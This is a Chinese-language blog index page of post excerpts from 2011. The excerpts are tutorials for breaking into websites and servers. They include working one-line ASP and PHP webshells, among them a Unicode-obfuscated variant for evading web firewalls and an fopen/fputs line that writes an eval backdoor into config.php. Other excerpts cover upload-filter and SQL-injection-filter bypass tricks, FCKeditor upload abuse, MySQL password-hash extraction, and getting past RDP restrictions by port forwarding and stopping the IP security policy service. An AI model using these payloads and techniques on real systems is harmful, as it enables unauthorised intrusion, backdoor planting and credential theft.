上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 30 下一页

2011年5月23日

解决注入工具无法提取关键字

摘要: SQL注入估计在大家眼里已经是老生常谈了,好像就那么回事,其实不然,在Pangolin开发过程中,我遇到过太多太多的特例以及继续深入注入的方法。这里跟大家讲讲关于资源ID不存在情况下的注入方法。什么叫“不存在资源ID”呢?举个例子,假设url为http://www.91ri.org/news.php?id=9999999,而对应9999999的资源其实是不存在的。这个情况下,使用传统的sql注入工具是没法判断注入点的(当然Pangolin是可以注入滴),更不用说提取数据了。很多情况下,互联网中存在大量的这种漏洞就被测试人员和开发人员漏掉了。也许您会想问,这种情况应该基本不存在才对?好吧,我列举 阅读全文

posted @ 2011-05-23 11:03 =_=! 阅读(255) 评论(0) 推荐(0) 编辑

2011年5月22日

利用ashx脚本写入脚本文件拿webshell

摘要: 刚在逛黑客笔记(http://hacknote.com/)的时候看到了一个很不错的上传突破,顺便发过来给大家分享下,该方法是利用在一些比较BT的上传上面,原文内容是写在ewebeditor过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handle 阅读全文

posted @ 2011-05-22 12:48 =_=! 阅读(1104) 评论(0) 推荐(0) 编辑

unicode变形一句话突破web防火墙过滤

摘要: 现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。1.新建一个mdb2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;(实际是<% execute request(“a”)%>)3.改后缀为asp/asa4.上传5.一句话客户端或者菜刀连接 阅读全文

posted @ 2011-05-22 11:33 =_=! 阅读(241) 评论(0) 推荐(0) 编辑

看看我是如何突破一流监控上传小马

摘要: 今 看了一个站。 有上传漏洞 。但是悲剧的是。 怎么传。都是显示空白。 经验告诉我。 我遇到了一流监控系统 。判断文件里是不是存在非法字符。 非法字符也就是它自身设置好的关键词。 一般都是 web 大马等上面的关键词。只要存在。 直接把整个文件过滤成空白。 也就是今我遇到是一样的。上传测试。发现。他不仅仅过滤一般的大马关键词、一句话的关键 函数。 = =|||他竟然直接判断是否存在 <%%> 这是所有asp都存在的 = =!! 需要传能解析的 asp.怎么能少了 <%%>呢?如何突破呢? 我翻我的一句话的时候看到了一个东西。如下:<script language= 阅读全文

posted @ 2011-05-22 11:30 =_=! 阅读(225) 评论(0) 推荐(0) 编辑

2011年5月20日

妙用遨游抓包找fckeditor上传木马路径

摘要: 最近有朋友问我利用Fckeditor上传漏洞并结合2003服务器解析漏洞拿网站webshell的时候总是找不到上传后文件的路径,怎么办呢?相信这个问题应该是很多朋友遇到过的。首先我们来看看Fckeditor的漏洞:http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/asp/connector.asp我们可以通过上面地址来打开一个安装了Fckeditor的网站,开起来后可以看到(1)很多朋友在没有注入漏洞的前提下,恐怕都无法列出f 阅读全文

posted @ 2011-05-20 21:39 =_=! 阅读(768) 评论(0) 推荐(0) 编辑

shell下连接dsn类型的数据库

摘要: 对于windows系统,经常碰到使用dsn的mdb/accsss,sql server 2000/2005数据库连接,主要是ip地址不知道,通过搜索,可以使用以下方法来找到: 网上也有人给了命令,自己看:reg export HKEY_LOCAL_MACHINE\SOFTWARE\ODBC\ODBC.INI c:\1.txtreg export HKEY_CURRENT_USER\Software\ODBC\ODBC.INI c:\2.txt 阅读全文

posted @ 2011-05-20 09:59 =_=! 阅读(147) 评论(0) 推荐(0) 编辑

2011年5月19日

防注入绕过必用11招

摘要: 1、运用编码技术绕过如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)2、通过空格绕过如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or'' swords'' =‘swords'',由于mssql的松散性,我们可以把or ''swords'' 之间的空格去掉,并不影响运行。3、运用字符串判断代替用经典的or 1=1判断绕过,如or ''sw 阅读全文

posted @ 2011-05-19 17:37 =_=! 阅读(184) 评论(0) 推荐(0) 编辑

2011年5月17日

php包含apache写马

摘要: 一句话木马<?eval($_POST[cmd]);?>到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);fclose( 阅读全文

posted @ 2011-05-17 19:21 =_=! 阅读(165) 评论(0) 推荐(0) 编辑

mysql hash 密码破解的方法

摘要: mysql hash 密码破解讲解:mysql的用户名密码保存在mysql库user表中,找到MySQL\data\mysql\目录下的 user.MYD user.MYI user.frm 三个文件,拷贝到自己的mysql数据库目录下,就可以查看用户的hash了。用sql语句提取hash则如下: use mysql; select user,password from user;得到hash: test:*085D85329E1557C869A120C9157315A07D51E8A7 ogame:*085D85329E1557C869A120C9157315A07D51E8A7 iii6_ 阅读全文

posted @ 2011-05-17 09:27 =_=! 阅读(3654) 评论(0) 推荐(0) 编辑

开了3389无法登录原因和解决办法

摘要: 通常通过命令netstat -ano看到3389端口就说明已经开启的远程管理,当然是端口没有修改的情况了.但是经常我们还是会碰到无法连接情况,本文就增对可能遇到的情况进行一些说明,包含问题和解决的思路办法,要根据实际情况灵活应变.1.情况一:服务器处在内网中 思路:通过端口反弹到你本机,利用Lcx反弹是最常见的手法,另外如果你有同一个网络的肉鸡那么同样也是可以的.2.情况二:做了IP安全策略 思路:停止IP安全策略服务即可,命令:net stop policyagent3.情况三:系统防火墙的拦截 思路:同情况一的思路一致4.情况四:系统用户只设置了某些用户才能登陆5.情况五:系统做了TCP/ 阅读全文

posted @ 2011-05-17 03:26 =_=! 阅读(356) 评论(0) 推荐(0) 编辑

上一页 1 ··· 14 15 16 17 18 19 20 21 22 ··· 30 下一页

导航